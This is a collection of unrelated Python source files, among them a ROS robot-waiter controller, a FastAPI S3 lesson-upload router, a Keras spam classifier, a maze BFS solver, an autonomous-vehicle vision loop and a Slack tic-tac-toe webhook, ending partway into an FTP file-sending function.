        self.object_recognition_client = actionlib.SimpleActionClient('/yolo_detection', yolo_detectionAction)
        self.speech_client = actionlib.SimpleActionClient('/tts', TtsAction)
        # Bool variable and wake_word subscriber for voice plan activation
        self.running = False
        rospy.Subscriber('/wake_word/wake_word_detected', String, self.handle_wake_word_detected)
        self.plan_publisher = rospy.Publisher('/p1/planToExec', String, queue_size=1)
        # Get the Tables Dictionary from the parameter server
        self.tables = rospy.get_param("/tables")
    def handle_wake_word_detected(self, data):
        """Kick off the plan once, when the wake phrase is heard."""
        wake_word = data.data
        if not self.running and wake_word == 'start the demo':
            self.running = True
            self.plan_publisher.publish('p1PlanNew')
    def execute_cb(self, goal):
        """Dispatch a Bridge goal: call the method named by goal.action
        with goal.params and report the (reset) result back."""
        rospy.loginfo("----------ExternalServer start----------")
        # log action and parameters
        rospy.loginfo("action is: " + str(goal.action))
        rospy.loginfo("params are: " + str(goal.params))
        # reset result
        self._result = lpb_msg.BridgeResult()
        # call the action
        getattr(self, goal.action)(*goal.params)
        self._bridge_server.set_succeeded(self._result)
        # end callback
        rospy.loginfo("----------ExternalServer end----------")
    def initialise(self):
        # initialise PNP variables
        pass
    def gotoHome(self):
        """Send the robot to the /Home pose via move_base and wait."""
        rospy.loginfo('Going to home')
        home = rospy.get_param('/Home')
        self.move_base_client.wait_for_server(rospy.Duration(15.0))
        goal = MoveBaseGoal()
        goal.target_pose.header = Header(frame_id="map", stamp=rospy.Time.now())
        goal.target_pose.pose = Pose(position = Point(**home['loc']['position']),
                                     orientation = Quaternion(**home['loc']['orientation']))
        rospy.loginfo('Sending goal location ...')
        self.move_base_client.send_goal(goal) #waits forever
        if self.move_base_client.wait_for_result():
            rospy.loginfo('Goal location achieved!')
        else:
            rospy.logwarn("Couldn't reach the goal!")
    def goto(self):
        """Drive to the current table's far (pose 0) or close (pose 1)
        pose, both read from the parameter server."""
        table_index = rospy.get_param('/HAL9000/current_table')
        pose_index = rospy.get_param('/HAL9000/current_pose')
        print table_index
        # TODO: move to individual action file
        rospy.loginfo('Going to: %d with pose %d', table_index, pose_index)
        self.move_base_client.wait_for_server(rospy.Duration(15.0))
        # For now
        if pose_index == 0:
            pose = 'far_pose'
        else:
            pose = 'close_pose'
        goal = MoveBaseGoal()
        goal.target_pose.header = Header(frame_id="map", stamp=rospy.Time.now())
        goal.target_pose.pose = Pose(position = Point(**self.tables['table' + str(table_index)]['loc'][pose_index][pose]['position']),
                                     orientation = Quaternion(**self.tables['table' + str(table_index)]['loc'][pose_index][pose]['orientation']))
        rospy.loginfo('Sending goal location ...')
        self.move_base_client.send_goal(goal) #waits forever
        if self.move_base_client.wait_for_result():
            rospy.loginfo('Goal location achieved!')
        else:
            rospy.logwarn("Couldn't reach the goal!")
        # If we moved close to the table means we have already taken the picture
        if pose_index == 1:
            self._result.condition_event = ['pictureDone']
            rospy.set_param('/HAL9000/current_pose', 0)
    def talk(self, speech_in):
        """Say speech_in via the TTS action server (and echo to console)."""
        print('\033[1;36mTIAGO: ' + speech_in + '\033[0m')
        tts_goal = TtsGoal()
        tts_goal.rawtext.lang_id = 'en_GB'
        tts_goal.rawtext.text = speech_in
        self.speech_client.send_goal(tts_goal)
    # subscribes to topic until a recent depth cloud image (less than 2 seconds ago) is taken
    def maskCallback(self, data):
        print('Time now: ' + str(rospy.Time.now().secs) + '. Time of pcl: ' + str(data.header.stamp.secs))
        if((rospy.Time.now().secs - data.header.stamp.secs) < 2):
            self.depth_points = data
            self.depth_sub.unregister()
    def countPeople(self):
        """Count people at the current table: grab a fresh depth cloud,
        mask it, run YOLO (coco) on the masked image, announce the count
        and store it on the parameter server; then switch to pose 1."""
        table_index = rospy.get_param('/HAL9000/current_table')
        # TODO: move to individual action file
        # Take a picture of the table from afar
        # Wait for recognition action server to come up and send goal
        # Step 1: Raise torso up to have a better view of people
        # Wait for the play motion server to come up and send goal
        # self.play_motion_client.wait_for_server(rospy.Duration(15.0))
        # pose_goal = PlayMotionGoal()
        # pose_goal.motion_name = "count_people"
        # pose_goal.skip_planning = True
        # self.play_motion_client.send_goal(pose_goal)
        # rospy.loginfo('Count people goal sent')
        # rospy.sleep(3)
        # DEPTH MASK
        # create depth cloud subscriber, wait for depth_points to be updated
        # NOTE(review): busy-wait loop with no sleep/timeout -- spins the CPU
        # until maskCallback fires; confirm this is acceptable here
        self.depth_points = None
        self.depth_sub = rospy.Subscriber('/xtion/depth_registered/points', PointCloud2, self.maskCallback)
        while True:
            if self.depth_points != None:
                break
        # create goal
        mask_goal = DepthMaskGoal()
        mask_goal.depth_points = self.depth_points
        mask_goal.filter_left = 1
        mask_goal.filter_right = 1
        mask_goal.filter_front = 3.5
        # send goal and wait for result
        self.depth_mask_client.send_goal(mask_goal)
        rospy.loginfo('Depth mask goal sent')
        rospy.loginfo('Waiting for the depth mask result...')
        self.depth_mask_client.wait_for_result()
        mask_result = self.depth_mask_client.get_result()
        # COCO DETECTION
        #TODO VIEW RESULTS BECAUSE INVISIBLE PERSON APPEARED
        self.object_recognition_client.wait_for_server(rospy.Duration(15.0))
        # create goal
        recognition_goal = yolo_detectionGoal()
        recognition_goal.image_raw = mask_result.img_mask
        recognition_goal.dataset = "coco"
        recognition_goal.confidence = 0.3
        recognition_goal.nms = 0.3
        # send goal and wait for result
        self.object_recognition_client.send_goal(recognition_goal)
        rospy.loginfo('Recognition goal sent')
        rospy.loginfo('Waiting for the detection result...')
        self.object_recognition_client.wait_for_result()
        count_objects_result = self.object_recognition_client.get_result()
        # dictionary of results
        object_count = defaultdict(int)
        for detection in count_objects_result.detected_objects:
            object_count[detection.name] += 1
        person_count = object_count['person']
        speech_out = 'I see ' + str(person_count) + ' person'
        if not person_count == 1:
            speech_out += 's'
        # view the image - debug
        # bridge = CvBridge()
        # frame = bridge.imgmsg_to_cv2(count_objects_result.image_bb, "bgr8")
        # cv2.imshow('image_masked', frame)
        # cv2.waitKey(0)
        # Step 1: Back to default
        # Wait for the play motion server to come up and send goal
        # self.play_motion_client.wait_for_server(rospy.Duration(15.0))
        # pose_goal = PlayMotionGoal()
        # pose_goal.motion_name = "back_to_default"
        # pose_goal.skip_planning = True
        # self.play_motion_client.send_goal(pose_goal)
        # rospy.loginfo('Back to default goal sent')
        # rospy.sleep(3)
        # output result
        self.talk(speech_out)
        # Update the number of people in the parameter server
        rospy.loginfo('Updating the number of people found at table %d' % table_index)
        rospy.set_param('/tables/table' + str(table_index) + '/person_count', person_count)
        rospy.loginfo('Updated the person counter successfully')
        # Switch to the pose closer to the table
        rospy.loginfo('Switching to the second pose')
        rospy.set_param('/HAL9000/current_pose', 1)
    # Sleeps are required to avoid Tiago's busy status from body motions controllers
    def identifyStatus(self):
        """Look down at the current table, run YOLO (costa) on an RGB
        frame, announce what is seen, and derive + store the table status
        (Already served / Needs serving / Dirty / Clean) from the stored
        person count and the detected objects."""
        # TODO: move to individual action file
        table_index = rospy.get_param('/HAL9000/current_table')
        rospy.loginfo('Identifying the status of: %d' % table_index)
        # Step 1: Look down to see the table
        # Wait for the play motion server to come up and send goal
        self.play_motion_client.wait_for_server(rospy.Duration(15.0))
        pose_goal = PlayMotionGoal()
        pose_goal.motion_name = "check_table"
        pose_goal.skip_planning = True
        self.play_motion_client.send_goal(pose_goal)
        rospy.loginfo('Looking down goal sent')
        rospy.sleep(3)
        # Step 2: Take a picture of the table surface
        # Wait for recognition action server to come up and send goal
        # COSTA DETECTION
        self.object_recognition_client.wait_for_server(rospy.Duration(15.0))
        # create goal
        recognition_goal = yolo_detectionGoal()
        recognition_goal.image_raw = rospy.wait_for_message('/xtion/rgb/image_raw', Image)
        recognition_goal.dataset = "costa"
        recognition_goal.confidence = 0.3
        recognition_goal.nms = 0.3
        # send goal and wait for result
        self.object_recognition_client.send_goal(recognition_goal)
        rospy.loginfo('Recognition goal sent')
        rospy.loginfo('Waiting for the detection result...')
        self.object_recognition_client.wait_for_result()
        count_objects_result = self.object_recognition_client.get_result()
        # dictionary of results
        object_count = defaultdict(int)
        for detection in count_objects_result.detected_objects:
            object_count[detection.name] += 1
        if len(object_count):
            speech_out = 'I see '
            for costa_object in object_count:
                speech_out += ', ' + str(object_count[costa_object]) + ' ' + str(costa_object)
                if not object_count[costa_object] == 1:
                    speech_out += 's'
            self.talk(speech_out)
        else:
            self.talk('no objects found')
        # Step 4: Get head and torso back to default
        pose_goal.motion_name = "back_to_default"
        self.play_motion_client.send_goal(pose_goal)
        rospy.loginfo('Default head position goal sent')
        rospy.sleep(3)
        # Step 4: Decide on table status and send tts goal to the sound server
        foundPerson = rospy.get_param('/tables/table' + str(table_index) + '/person_count')
        foundConsumable = len(object_count)
        if foundPerson:
            if foundConsumable:
                result = 'Already served'
            else:
                result = 'Needs serving'
        else:
            if foundConsumable:
                result = 'Dirty'
            else:
                result = 'Clean'
        # Update the status of the table in the parameter server
        rospy.loginfo('Updating the table status of table %d', table_index)
        rospy.set_param('/tables/table' + str(table_index) + '/status', result)
        rospy.loginfo('Updated the table status successfully')
        # output result
        self.talk('Status of table {0} is {1}'.format(table_index, result))
        rospy.sleep(1)
    def count(self):
        """Pick the lowest-id table whose status is still 'unknown' as the
        next target; emit 'doneCounting' when every table is identified."""
        # TODO: move to individual action file
        rospy.loginfo('Counting all the tables')
        # if any table status is unknown, set it to the robot's current table
        self.tables = rospy.get_param("/tables")
        print(self.tables)
        unknown_exist = False
        for table in self.tables:
            print(table)
            if (self.tables[table])['status'] == 'unknown':
                if not unknown_exist:
                    unknown_exist = True
                    next_table = self.tables[table]['id']
                elif self.tables[table]['id'] < next_table:
                    next_table = self.tables[table]['id']
        if unknown_exist:
            rospy.set_param('/HAL9000/current_table', next_table)
            print "\033[1;33m" + "The next table is " + str(next_table) + "\033[0m"
        else:
            # if all tables have been identified, counting is done
            self._result.condition_event = ['doneCounting']
|
from typing import Dict, List
from fastapi import Depends,File, UploadFile, APIRouter, HTTPException
from sqlalchemy.orm import Session
from app.authentication import models
#from courses_live.database import SessionCourse, some_engine
from app.talent.database import SessionLocal, engine,database
import shutil
import datetime
#from coursebysubject.models import subjects
# Pagination
from fastapi_pagination import Page, pagination_params
from fastapi_pagination.paginator import paginate
router = APIRouter()
import uuid
from pathlib import Path
import time
#from fastapi.staticfiles import StaticFiles
from starlette.staticfiles import StaticFiles
import os
from os.path import dirname, abspath, join
import cloudinary
import cloudinary.uploader
from . import crud
def get_db():
    """FastAPI dependency: yield a DB session, always closing it after."""
    session = SessionLocal()
    try:
        yield session
    finally:
        session.close()
models.Base.metadata.create_all(bind=engine)
import boto3
from fastapi.param_functions import File, Body
from s3_events.s3_utils import S3_SERVICE_VIDEO
from app.configs import bucketinfo
def bucket_config():
    """Return the S3 bucket/credential settings object from app config."""
    return bucketinfo.setting()
# AWS credentials/bucket settings from app config (env-var fallbacks noted inline)
AWS_ACCESS_KEY_ID = bucket_config().AWS_ACCESS_KEY_ID#os.getenv("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = bucket_config().AWS_SECRET_ACCESS_KEY#os.getenv("AWS_SECRET_ACCESS_KEY")
AWS_REGION = bucket_config().AWS_REGION #os.getenv("AWS_REGION")
S3_Bucket = bucket_config().S3_Bucket #os.getenv("S3_Bucket")
# key prefix under which lesson videos are stored in the bucket
S3_Key = "lesson" # change everywhere
# base URL under which uploaded objects are publicly reachable
PUBLIC_DESTINATION = "https://cinedarbaar.s3.ap-south-1.amazonaws.com/"
s3_client = S3_SERVICE_VIDEO(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_REGION)
@router.post("/course/lesson")
async def create_lesson(
    course_id:int,title:str,name:str,description:str,chapter:int,fileobject: UploadFile= File(...), filename: str = Body(default=None), db: Session = Depends(get_db)
):
    """
    Upload a lesson video to S3 and create the lesson record.

    Raises HTTPException 400 for unsupported file types (only mp4/3gp/mkv
    are accepted) or failed uploads.
    """
    if filename is None:
        #filename = generate_png_string()
        extension_ok = fileobject.filename.split(".")[-1] in ("mp4", "3gp", "mkv")
        if not extension_ok:
            # bug fix: the message claimed "jpg or png" although videos are
            # expected; also raise a proper 400 instead of returning a string
            raise HTTPException(status_code=400, detail="video must be mp4, 3gp or mkv format!")
        suffix = Path(fileobject.filename).suffix
        # unique, time-stamped object name
        filename = time.strftime( str(uuid.uuid4().hex) + "%Y%m%d-%H%M%S" + suffix )
    data = fileobject.file._file  # Converting tempfile.SpooledTemporaryFile to io.BytesIO
    uploads3 = await s3_client.upload_fileobj(bucket=S3_Bucket, key=S3_Key+"/"+filename, fileobject=data)
    if not uploads3:
        raise HTTPException(status_code=400, detail="Failed to upload in S3")
    # plain concatenation: os.path.join would break the URL on Windows
    url = PUBLIC_DESTINATION + S3_Key + "/" + filename
    return crud.create_lesson(db=db,name=name,title=title,description=description,url=url,course_id=course_id,chapter=chapter)
@router.put("/course/lesson/{id}")
async def update_lesson(
    id:int,course_id:int,title:str,name:str,description:str,chapter:int,fileobject: UploadFile= File(...), filename: str = Body(default=None), db: Session = Depends(get_db)
):
    """
    Replace a lesson's video on S3 and update its metadata.

    Raises HTTPException 400 for unsupported file types or failed uploads
    and 404 when the lesson does not exist.
    """
    from sqlalchemy import text  # local import for parameterized SQL below

    if filename is None:
        #filename = generate_png_string()
        extension_ok = fileobject.filename.split(".")[-1] in ("mp4", "3gp", "mkv")
        if not extension_ok:
            # bug fix: wrong "jpg or png" message; raise 400 instead of a string
            raise HTTPException(status_code=400, detail="video must be mp4, 3gp or mkv format!")
        suffix = Path(fileobject.filename).suffix
        filename = time.strftime( str(uuid.uuid4().hex) + "%Y%m%d-%H%M%S" + suffix )
    data = fileobject.file._file  # Converting tempfile.SpooledTemporaryFile to io.BytesIO
    uploads3 = await s3_client.upload_fileobj(bucket=S3_Bucket, key=S3_Key+"/"+filename, fileobject=data )
    if not uploads3:
        raise HTTPException(status_code=400, detail="Failed to upload in S3")
    url = PUBLIC_DESTINATION + S3_Key + "/" + filename
    subject = crud.get_lesson(db,id)
    if not subject:
        raise HTTPException(status_code=404, detail="Lesson not found")
    # security fix: the original interpolated user-supplied strings straight
    # into the SQL statement (SQL injection); use bound parameters instead
    query = text(
        "UPDATE lessons SET title=:title , name=:name, description=:description, "
        "COURSE_ID=:course_id , chapter=:chapter, url=:url WHERE id=:id"
    )
    db.execute(query, {"title": title, "name": name, "description": description,
                       "course_id": course_id, "chapter": chapter, "url": url, "id": id})
    db.commit()
    return {"Result" : "Module Updated Succesfully"}
@router.get("/courses/lesson/", dependencies=[Depends(pagination_params)])
def lesson_list(db: Session = Depends(get_db)):
    """Return all lessons as a paginated response."""
    return paginate(crud.lesson_list(db=db))
@router.get("/courses/lesson/{id}")
def course_detail(id:int,db: Session = Depends(get_db)):
    """Return a single lesson by primary key, or 404 when missing."""
    lesson = crud.get_lesson(db=db, id=id)
    if lesson is None:
        raise HTTPException(status_code=404,detail="Course by this id is not in database")
    return { "Lesson":lesson}
@router.get("/courses/lesson/{course_id}/{chapter}")
def course_detail_weekly(course_id:int,chapter:int,db: Session = Depends(get_db)):
    """Return the lessons of one course chapter, or 404 when none exist."""
    weekly = crud.course_list_weekly(db, course_id, chapter)
    if not weekly:
        raise HTTPException(status_code=404,detail="Course by this id is not in database")
    return { "Lesson":weekly}
@router.delete("/courses/lesson/{id}")
async def delete(id: int, db: Session = Depends(get_db)):
    """Delete one lesson by id; 404 when the id is unknown."""
    subject = crud.get_lesson(db, id)
    if not subject:
        raise HTTPException(status_code=404,detail="Course by this id is not in database")
    # Bound parameter instead of string concatenation (SQL injection hygiene).
    db.execute("Delete From lessons WHERE id=:id", {"id": id})
    db.commit()
    return "deleted Succesfully"
|
import math


def min_height(area, base):
    """Return the minimum integer height of a triangle with the given area
    and base: from area = base * height / 2, height >= 2*area/base, rounded up.

    (Renamed from ``min``, which shadowed the builtin.)
    """
    return math.ceil((2 * area) / base)


if __name__ == '__main__':
    # Guarded so importing this module does not block on stdin.
    m, n = input().split()
    print("Minimum height is %d" % min_height(int(m), int(n)))
|
from keras.layers import Dense, Input, GlobalMaxPooling1D
from keras.layers import Conv1D, MaxPooling1D
from keras.models import Model
def CNN(embedding_layer):
    """Build and compile a 1-D CNN text classifier on top of *embedding_layer*.

    Input: padded token-id sequences of length 50. Output: 2-way softmax
    (spam/ham). Returns the compiled Keras Model.
    """
    # Build and wire the remaining layers on top of the embedding.
    label_num = {"spam":1, "ham":0}  # only its size (2 classes) is used below
    MAX_SEQUENCE_LENGTH = 50
    sequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32') # placeholder for token-id sequences
    embedded_sequences = embedding_layer(sequence_input) # (num_sentences, 50, embedding_dim) — dim set by embedding_layer; TODO confirm
    x = Conv1D(128, 5, activation='relu')(embedded_sequences)
    x = MaxPooling1D(2)(x)
    x = Conv1D(128, 5, activation='relu')(x)
    x = MaxPooling1D(2)(x)
    x = Conv1D(128, 5, activation='relu')(x)
    x = MaxPooling1D(2)(x)
    x = GlobalMaxPooling1D()(x)  # collapse the time axis to one 128-vector
    x = Dense(128, activation='relu')(x)
    preds = Dense(len(label_num), activation='softmax')(x)
    model = Model(sequence_input, preds)
    model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
    model.summary()
    return model
'''
Created on 20/04/2013
@author: cristian
'''
import os
import unittest
from app import db
from app.modelo import User2
#basedir = os.path.abspath(os.path.dirname(__file__))
class UsuarioTestCase(unittest.TestCase):
    """Login smoke test (Python 2 era; see review NOTEs — several names are undefined)."""
    def setUp(self):
        # NOTE(review): neither `microblog` nor `tempfile` is imported in this
        # file — these lines raise NameError as written; confirm the intended
        # application module (the file imports `app`, not `microblog`).
        self.db_fd, microblog.app.config['DATABASE'] = tempfile.mkstemp()
        self.app = microblog.app.test_client()
        microblog.init_db()
    def tearDown(self):
        os.close(self.db_fd)
        # NOTE(review): `flaskr` is also undefined (looks copied from the
        # Flask tutorial); presumably should match the module used in setUp.
        os.unlink(flaskr.DATABASE)
    def login(self, nombre, password):
        print 'fer2'
        # NOTE(review): Flask's test client spells this `follow_redirects`;
        # `follows_redirects` here is passed as an unknown kwarg — confirm.
        return self.app.post('/login', data=dict(
            name = nombre,
            passWord = password),
            follows_redirects = True
        )
    def test_login(self):
        # Smoke test only: posts credentials and dumps the response body.
        rv = self.login('admin', 'default')
        print str(rv.data)
    #def testSave(self):
    # r = self.usuario1.add_usr()
    # print "Creamos un usuario nuevo" + self.usuario1.nombre
    # assertEqual(r, "Exito" )
    # self.contador = 1
if __name__ == '__main__':
    unittest.main()
import json, requests, os
CA_FILE = 'data-hold/california.json'
# Download the dataset once and cache it locally; later runs read the cache.
if not os.path.exists(CA_FILE):
    # Fixed spacing: the original printed "Can't find<path>so fetching...".
    print("Can't find " + CA_FILE + " so fetching remote copy...")
    resp = requests.get("http://stash.compjour.org/data/usajobs/california-all.json")
    # Context managers close the handles; the original leaked both files.
    with open(CA_FILE, 'w') as f:
        f.write(resp.text)
with open(CA_FILE) as f:
    rawdata = f.read()
jobs = json.loads(rawdata)['jobs']
def cleanmoney(val):
    """Convert a currency string such as '$12,345' to a float."""
    return float(val.replace("$", "").replace(",", ""))
def cleansalarymax(job):
    # Sort key: the job's 'SalaryMax' field parsed to a float.
    return cleanmoney(job['SalaryMax'])
# Print the five best-paid jobs as CSV: title,min,max (salaries truncated to ints by %d).
sortedjobs = sorted(jobs, key=cleansalarymax, reverse=True)
for job in sortedjobs[:5]:
    print('%s,%d,%d' % (job['JobTitle'], cleanmoney(job['SalaryMin']), cleanmoney(job['SalaryMax'])))
from collections import deque

level = [
    "WWWWWWWWWWXXWWWWWWWWWW",
    "W                    W",
    "W WWWWWWWWWWWWWWWWWW W",
    "W W                W W",
    "W W WWWWWW  WWWWWW W W",
    "W W W            W W W",
    "W W W WWWW  WWWW W W W",
    "W W W W        W W W W",
    "W   W W  WWWW  W W   W",
    "W      W  WWWW       W",
    "W   WWWWWW    WWWWWW W",
    "W W       WXXW       W",
    "W WWWWW WWXXWW WWWWW W",
    "X     WXXXXW         X",
    "W WWWWW WWWWWW WWWWW W",
    "W W                W W",
    "W WWWWWW   X  WWWWWW W",
    "W W       WWWW     W W",
    "W   WWWW W    W WWWW W",
    "W W W  W W    W W  W W",
    "W W WWWW W    W WWWW W",
    "W W      W    W    W W",
    "W W WWWWWW    WWWWWW W",
    "W W                W W",
    "W WWWWWWWWWWWWWWWWWW W",
    "W                    W",
    "WWWWWWWWWWXXWWWWWWWWWW",
]


def shortest_steps(grid, sr, sc, tr, tc):
    """Breadth-first search over *grid* ('W' cells are walls) from (sr, sc)
    to (tr, tc); return the number of steps, or -1 if unreachable.

    The original used a 50-valued sentinel (so any distance >= 50 and every
    unreachable cell printed 50), oversized the array by +10, and popped from
    the end of a list (a stack, not a queue). A deque-based BFS fixes all of
    that; unreachable cells now report -1.
    """
    rows, cols = len(grid), len(grid[0])
    dist = [[-1] * cols for _ in range(rows)]  # -1 == unvisited
    dist[sr][sc] = 0
    frontier = deque([(sr, sc)])
    while frontier:
        r, c = frontier.popleft()
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] != 'W' and dist[nr][nc] == -1:
                dist[nr][nc] = dist[r][c] + 1
                frontier.append((nr, nc))
    return dist[tr][tc]


if __name__ == '__main__':
    # Same stdin protocol as before: start row, start col, end row, end col.
    bx = int(input())
    by = int(input())
    ex = int(input())
    ey = int(input())
    print(shortest_steps(level, bx, by, ex, ey))
|
from cnn import AnimalClassifier
if __name__ == '__main__':
    # Build the network, then classify a single validation image.
    model = AnimalClassifier()
    model.makeModel()
    # model.train('data/training', 'data/validation/')
    result = model.classify('data/validation/airplane/airplane01.tif')
    print('Image is classified as: ', result)
#----------------------------------------------#
# Autonomous Vehicle Machine Vision System #
# Machine Vision System #
# machineVision.py #
# Written by: #
# Jeremy Beauchamp, Zhaojie Chen, #
# Trenton Davis, and Xudong Yuan #
#----------------------------------------------#
'''
This file contains the overall Machine Vision System as well as any constants that
are necessary. All of the functionality of the whole system is contained in this
single file.
'''
# Import libraries
import time
import threading
from queue import Queue
import cv2
# Import modules
import imageData as imd
import gui as g
import stabilizer as s
import enhancer as e
import objects as o
import event as ev
import trafficLightDetector as tld
import yellowline_detection as yd
# MachineVision Class
################################################################################
class MachineVision:
    '''
    The MachineVision class is the overall class that contains the Autonomous
    Vehicle Machine Vision System.
    :ivar cap: the OpenCV VideoCapture used to read frames
    :ivar gui: the GUI that displays the images
    :ivar stabilizer: the video stabilizer
    :ivar enhancer: the image enhancer
    :ivar BufferSize: the amount of images stored in the buffer
    :ivar ImageBuffer: the buffer storing images
    :ivar BufferIndex: the current index in the buffer
    '''
    # NOTE(review): objectSet=[] is a shared mutable default — safe only if
    # ev.Event copies it; confirm.
    def __init__(self, video, objectSet = []):
        '''
        Creates all variables.
        :type video: str or int
        :param video: source handed to cv2.VideoCapture (file path or device index)
        :type objectSet: list
        :param objectSet: detectable objects forwarded to ev.Event
        '''
        self.cap = cv2.VideoCapture(video)
        self.gui = g.GUI()
        self.stabilizer = s.Stabilizer()
        self.enhancer = e.Enhancer()
        self.event = ev.Event(objectSet)
        self.trafficLightNN = tld.TrafficLightDetector()
        # Distances (presumably meters ahead) scanned by the yellow-line
        # detector — TODO confirm units.
        LookoutRange = [1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5.5, 6.5, 7.5] #[1.5, 2.5, 3.5, 5, 7]#
        Region_WB = [250, 270, 360, 380]
        self.line_detec = yd.yellowline(self.cap, LookoutRange, Region_WB)
        self.current = 0          # latest ImageData frame (0 until first capture)
        self.BufferSize = 0
        self.ImageBuffer = []
        self.BufferIndex = 0
        self.printLock = threading.Lock()
        self.trafficLock = threading.Lock()
        self.lineLock = threading.Lock()
        self.q = Queue()          # job ids consumed by assignJob workers
    def initialize(self):
        '''
        Creates image buffer and activates the camera and GUI.
        '''
        self.BufferSize = 15
        self.ImageBuffer = []
        for i in range (self.BufferSize):
            self.ImageBuffer.append(imd.ImageData(0))
        self.stabilizer.smoothingWindow = self.BufferSize
        self.gui.activate()
        self.trafficLightNN.activate()
        #self.enhancer.x = self.camera.RES[0]
        #self.enhancer.y = self.camera.RES[1]
        self.enhancer.x = 640
        self.enhancer.y = 480
        # Two job ids: 0 = traffic lights, 1 = yellow lines (see assignJob).
        for i in range (2):
            self.q.put(i)
    def shutdown(self):
        '''
        Shuts down the GUI if it is still active.
        '''
        if(self.gui.active):
            self.gui.deactivate()
    def detectTrafficLight(self):
        '''
        Detects if there is a traffic light present.
        Runs forever, publishing results into event object 0.
        '''
        while(True):
            res1, res2 = self.trafficLightNN.detect(self.current)
            self.event.objects[0].active = res1
            self.event.objects[0].green = res2
    def detectYellowLines(self):
        '''
        Detects if there are yellow lines on the screen.
        Runs forever, publishing results into event object 1.
        '''
        while(True):
            _,res1,res2,res3,res4,res5 = self.line_detec.line_detec(self.current)
            self.event.objects[1].active = res1
            self.event.objects[1].leftLine = res2
            self.event.objects[1].rightLine = res3
            self.event.objects[1].turning = res4
            self.event.objects[1].turnRight = res5
    def assignJob(self):
        '''
        Assigns jobs for the multithreading to work.
        NOTE(review): both detect loops never return, so task_done() below is
        unreachable — confirm whether q.join() is relied on anywhere.
        '''
        i = self.q.get()
        if(i == 0):
            self.detectTrafficLight()
        elif(i == 1):
            self.detectYellowLines()
        self.q.task_done()
    def oneLoop(self):
        '''
        Processes a single frame (legacy single-step path).
        NOTE(review): reads self.camera, which is never defined (__init__ sets
        self.cap) — calling this raises AttributeError; run() is the live path.
        '''
        self.current = imd.ImageData(self.camera.capture())
        self.current.frame = self.enhancer.enhance(self.current)
        # if(self.BufferIndex > 1):
        # previous = self.ImageBuffer[self.BufferIndex - 1]
        # self.current.frame = self.stabilizer.stabilize(previous, self.current)
        for i in range (2):
            t = threading.Thread(target = self.assignJob)
            t.daemon = True
            t.start()
        if(self.event.objects[0].active):
            print("Light Detected")
            if(self.event.objects[0].green):
                print("Green")
        else:
            print()
        # if(self.gui.active):
        # self.gui.display(self.current)
        self.ImageBuffer[self.BufferIndex] = self.current
        self.BufferIndex = self.BufferIndex + 1
        if(self.BufferIndex >= self.BufferSize):
            self.BufferIndex = 0
        return self.current, self.event.convert()
    def run(self):
        '''
        Runs the entire Machine Vision System.
        Reads frames at up to 15 FPS until the capture closes, the GUI is
        deactivated, or the user interrupts with Ctrl-C.
        '''
        self.initialize()
        timePerFrame = 1.0 / 15   # pace the loop to ~15 FPS
        self.current = imd.ImageData(0)
        previous = imd.ImageData(0)
        try:
            while(self.cap.isOpened()):
                start = time.time()
                _, image = self.cap.read()
                self.current = imd.ImageData(image)
                self.current.frame = self.enhancer.enhance(self.current)
                # if(self.BufferIndex > 1):
                # previous = self.ImageBuffer[self.BufferIndex - 1]
                # self.current.frame = self.stabilizer.stabilize(previous, self.current)
                # Spawn detector workers (they loop forever; see assignJob).
                for i in range (2):
                    t = threading.Thread(target = self.assignJob)
                    t.daemon = True
                    t.start()
                if(self.event.objects[0].active):
                    print("Light Detected")
                    if(self.event.objects[0].green):
                        print("Green")
                else:
                    print()
                if(self.gui.active):
                    self.gui.display(self.current)
                else:
                    break   # GUI closed -> stop the whole loop
                self.ImageBuffer[self.BufferIndex] = self.current
                self.BufferIndex = self.BufferIndex + 1
                if(self.BufferIndex >= self.BufferSize):
                    self.BufferIndex = 0
                end = time.time()
                # Sleep off the remainder of the frame budget.
                if((end - start) < timePerFrame):
                    time.sleep(timePerFrame - (end - start))
        except KeyboardInterrupt:
            pass
        self.shutdown()
################################################################################
|
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
from flask_restful import Resource, Api
import utils
API_VERSION = 'v1'
# 3x3 tic-tac-toe board, empty cells as None.
STARTING_BOARD = [[None, None, None], [None, None, None], [None, None, None]]
VALID_COMMANDS = ['start', 'board', 'move', 'help', 'pony']
app = Flask(__name__)
api = Api(app)
# DB credentials and the Slack token come from config.cfg.
app.config.from_pyfile('config.cfg')
app.config['API_VERSION'] = API_VERSION
app.config['STARTING_BOARD'] = STARTING_BOARD
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://{}:{}@{}/{}'.format(
    app.config['DB_USERNAME'],
    app.config['DB_PASSWORD'],
    app.config['DB_SERVER'],
    app.config['DB_NAME'],
)
db = SQLAlchemy(app)
# NOTE(review): imported after `db` is created — presumably board.py needs
# the db object at import time (circular-import avoidance); confirm.
from board import Board
class Hook(Resource):
    """Slack slash-command webhook: validate the token, parse the command,
    and dispatch it to the matching Board handler."""

    def post(self):
        data = request.form
        # Reject requests that do not carry our Slack token.
        if data["token"] != app.config['SLACK_TOKEN']:
            return "Error: Invalid Slack API Token"
        text = data['text'].split()
        if not text:
            return """Please specify a command {} and any argument/s."""\
                .format(str(VALID_COMMANDS))
        command, args = text[0], text[1:]
        if command not in VALID_COMMANDS:
            return """{} is not a valid command. The valid commands are {}."""\
                .format(command, str(VALID_COMMANDS))
        # Dispatch to the Board class method named after the command.
        response = getattr(Board, command)(data, args)
        return jsonify({
            'response_type': 'in_channel',
            'text': response
        })
# Mount the webhook under the versioned path, e.g. /v1/hook.
api.add_resource(Hook, '/{}/hook'.format(app.config['API_VERSION']))
if __name__ == "__main__":
    app.run(host='0.0.0.0')
|
#将接收到的FTP字节流直接发送给UE侧
#!/usr/lib/python3.4
#-*-coding:utf-8-*-
import socket
import os, struct
def ftp_sendfile(addr, localpath='/home/nano/openair-cn'):
    """Send one local file over a TCP connection to *addr*.

    Wire format: a struct-packed '128sl' header (basename bytes + file size)
    followed by the raw contents in 1024-byte chunks. Does nothing beyond
    connecting if *localpath* is not a regular file.
    """
    # Context managers close the socket/file even on error (the original
